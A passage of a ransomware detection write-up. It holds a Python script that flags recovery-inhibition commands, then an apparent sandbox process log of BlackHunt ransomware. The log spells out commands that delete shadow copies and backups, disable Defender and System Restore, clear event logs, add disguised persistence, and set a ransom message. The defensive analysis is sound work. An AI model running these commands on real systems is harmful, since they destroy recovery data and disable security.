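    ("vssadmin.exe", r"\bresize\s+shadowstorage\b", "Interacts with shadow copies", "T1490"),
    ("wmic.exe", r"\bshadowcopy\s+delete\b", "Deletes shadow copies", "T1490"),
    ("wbadmin.exe", r"\bdelete\s+(catalog|systemstatebackup|backup)\b", "Deletes backup catalog", "T1490"),
    ("bcdedit.exe", r"\brecoveryenabled\s+no\b|\bbootstatuspolicy\s+ignoreallfailures\b",
     "Modifies boot configuration data", "T1490"),
    ("fsutil.exe", r"\busn\s+deletejournal\b", "Deletes NTFS change journal", "T1070"),
    ("wevtutil.exe", r"^\s*(cl|clear-log)\b", "Clears Windows event logs", "T1070.001"),
]
_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def split_command(cmd):
    """Return (tool basename, lowercased and with .exe added, remaining args)."""
    m = _FIRST_TOKEN.match(cmd)
    if not m:
        return "", ""
    tool = ntpath.basename(m.group(1) or m.group(2)).lower()
    if not tool.endswith(".exe"):
        tool += ".exe"
    return tool, cmd[m.end():].strip()


def classify(cmd):
    """Matching (label, technique) pairs for one command line.  A cmd.exe /c
    or /k wrapper is unwrapped so the inner command is what gets checked."""
    tool, args = split_command(cmd)
    if tool == "cmd.exe":
        m = re.match(r"(?i)\s*/[ck]\s+(.*)", args)
        return classify(m.group(1)) if m else []
    found = []
    for rule_tool, pattern, label, technique in RULES:
        if tool == rule_tool and re.search(pattern, args, re.IGNORECASE):
            found.append((label, technique))
    return found


def scan(command_lines):
    """classify() over many command lines; one finding dict per match."""
    findings = []
    for cmd in command_lines:
        for label, technique in classify(cmd):
            findings.append({"command": cmd, "label": label, "technique": technique})
    return findings


def recovery_inhibited(findings):
    """True when shadow copies are deleted AND at least one further recovery
    mechanism (backup catalog, boot recovery, USN journal) is removed, the
    combination this report shows and one legitimate admin work rarely produces."""
    labels = {f["label"] for f in findings}
    others = {"Deletes backup catalog", "Modifies boot configuration data",
              "Deletes NTFS change journal"}
    return "Deletes shadow copies" in labels and bool(labels & others)


# Constructed sample: canonical ransomware uses of these tools, one of them
# wrapped in cmd.exe /c the way the process tree wraps reg.exe, plus noise.
SAMPLE_COMMANDS = [
    '"C:\\Windows\\System32\\cmd.exe" /c vssadmin delete shadows /all /quiet',
    "wbadmin delete catalog -quiet",
    "bcdedit /set {default} recoveryenabled no",
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    "fsutil usn deletejournal /D C:",
    '"C:\\Windows\\system32\\wevtutil.exe" cl Security',
    "wevtutil cl System",
    "ping 127.0.0.1 -n 3",          # benign noise
    "vssadmin list shadows",        # read-only, must not match
]

if __name__ == "__main__":
    hits = scan(SAMPLE_COMMANDS)
    for h in hits:
        print(f"{h['technique']:<9} {h['label']:<34} {h['command']}")
    print("recovery inhibited:", recovery_inhibited(hits))
```

Matching on the tool basename plus arguments rather than on the full path is deliberate: the report shows the same tools launched both directly and through cmd.exe, and a rule keyed on `C:\Windows\System32\vssadmin.exe` misses a copy run from another directory.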
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe (PID 4536)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\System32\cmd.exe (PID 3216)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4988)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe (PID 3008)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4784)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe (PID 636)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 620)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe (PID 828)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 2032)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe (PID 1940)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3660)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        - Adds Run key to start application
  [2] C:\Windows\System32\cmd.exe (PID 4380)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 2208)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        - Modifies Windows Defender Real-time Protection settings
  [2] C:\Windows\System32\cmd.exe (PID 5112)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1116)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 4228)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1316)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  [2] C:\Windows\System32\cmd.exe (PID 4300)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4872)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 3256)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 2416)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe (PID 3392)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    [3] C:\Windows\system32\reg.exe (PID 4152)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe (PID 2400)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4876)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe (PID 1528)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4648)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe (PID 4600)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1444)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2052)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 2224)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2764)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 1152)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2900)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 3632)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 116)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 1804)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 5096)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 2968)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 4368)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 540)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2860)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 8016)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2676)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 10552)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2684)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 4900)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 4992)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 6340)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 3412)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 8184)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 3992)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 8968)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 5048)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 9080)
        cmdline: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 4640)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 9208)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2816)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 11192)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe (PID 2608)
      cmdline: "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe" /F
    [3] C:\Windows\system32\schtasks.exe (PID 5912)
        cmdline: SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe" /F
        - Creates scheduled task(s)
  [2] C:\Windows\System32\cmd.exe (PID 1272)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    [3] C:\Windows\system32\vssadmin.exe (PID 9676)
        cmdline: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 1832)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    [3] C:\Windows\system32\vssadmin.exe (PID 9312)
        cmdline: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        - Enumerates connected drives
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 1496)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    [3] C:\Windows\system32\vssadmin.exe (PID 9240)
        cmdline: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 2472)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] C:\Windows\system32\vssadmin.exe (PID 9680)
        cmdline: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 5020)
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] C:\Windows\system32\bcdedit.exe (PID 9368)
        cmdline: bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe (PID 3392)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\vssadmin.exe (PID 9352)
        cmdline: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 4568)
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] C:\Windows\system32\fsutil.exe (PID 9524)
        cmdline: fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal
  [2] C:\Windows\System32\cmd.exe (PID 428)
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] C:\Windows\system32\bcdedit.exe (PID 9304)
        cmdline: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe (PID 4388)
      cmdline: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] C:\Windows\system32\wbadmin.exe (PID 9520)
        cmdline: wbadmin.exe delete catalog -quiet
        - Deletes backup catalog
  [2] C:\Windows\System32\cmd.exe (PID 4444)
      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] C:\Windows\System32\Conhost.exe (PID 2052)
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\system32\schtasks.exe (PID 9308)
        cmdline: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  [2] C:\Windows\System32\cmd.exe (PID 7056)
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    [3] C:\Windows\system32\fsutil.exe (PID 12932)
        cmdline: fsutil usn deletejournal /D F:\
        - Enumerates connected drives
  [2] C:\Windows\System32\cmd.exe (PID 6984)
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    [3] C:\Windows\system32\fsutil.exe (PID 5684)
        cmdline: fsutil usn deletejournal /D C:\
  [2] C:\Windows\System32\cmd.exe (PID 5328)
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    [3] C:\Windows\system32\fsutil.exe (PID 5884)
        cmdline: fsutil usn deletejournal /D M:\
        - Enumerates connected drives
  [2] C:\Windows\System32\cmd.exe (PID 7180)
      cmdline: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    [3] C:\Windows\system32\wevtutil.exe (PID 12124)
        cmdline: wevtutil.exe cl Setup
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 5932)
      cmdline: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    [3] C:\Windows\system32\wevtutil.exe (PID 6368)
        cmdline: wevtutil.exe cl Security
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 12876)
      cmdline: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    [3] C:\Windows\system32\wevtutil.exe (PID 5404)
        cmdline: wevtutil.exe cl Application
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 5964)
      cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] C:\Windows\system32\vssadmin.exe (PID 6516)
        cmdline: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 14264)
      cmdline: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    [3] C:\Windows\system32\wevtutil.exe (PID 11664)
        cmdline: wevtutil.exe cl Security /e:false
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 12840)
      cmdline: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    [3] C:\Windows\system32\wevtutil.exe (PID 11360)
        cmdline: wevtutil.exe cl System
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 6408)
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] C:\Windows\system32\bcdedit.exe (PID 10564)
        cmdline: bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe (PID 5800)
      cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] C:\Windows\system32\bcdedit.exe (PID 6400)
        cmdline: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe (PID 11288)
      cmdline: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] C:\Windows\system32\fsutil.exe (PID 7540)
        cmdline: fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal
  [2] C:\Windows\System32\cmd.exe (PID 8216)
      cmdline: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] C:\Windows\system32\wbadmin.exe (PID 8232)
        cmdline: wbadmin.exe delete catalog -quiet
        - Deletes backup catalog
  [2] C:\Windows\System32\cmd.exe (PID 12272)
      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] C:\Windows\system32\schtasks.exe (PID 10792)
        cmdline: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  [2] C:\Windows\System32\cmd.exe (PID 6112)
      cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    [3] C:\Windows\system32\reg.exe (PID 5840)
        cmdline: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  [2] C:\Windows\System32\cmd.exe (PID 7224)
      cmdline: "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    [3] C:\Windows\system32\schtasks.exe (PID 9212)
        cmdline: SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  [2] C:\Windows\System32\cmd.exe (PID 7388)
      cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    [3] C:\Windows\system32\reg.exe (PID 13756)
        cmdline: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  [2] C:\Windows\System32\cmd.exe (PID 10444)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    [3] C:\Windows\system32\reg.exe (PID 11080)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  [2] C:\Windows\System32\cmd.exe (PID 10516)
      cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    [3] C:\Windows\system32\taskkill.exe (PID 11536)
        cmdline: taskkill /IM mshta.exe /f
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 14248)
      cmdline: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    [3] C:\Windows\system32\reg.exe (PID 13608)
        cmdline: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  [2] C:\Windows\System32\cmd.exe (PID 9468)
      cmdline: "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    [3] C:\Windows\system32\notepad.exe (PID 6536)
        cmdline: notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  [2] C:\Windows\System32\cmd.exe (PID 6752)
      cmdline: "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
      - Checks computer location settings
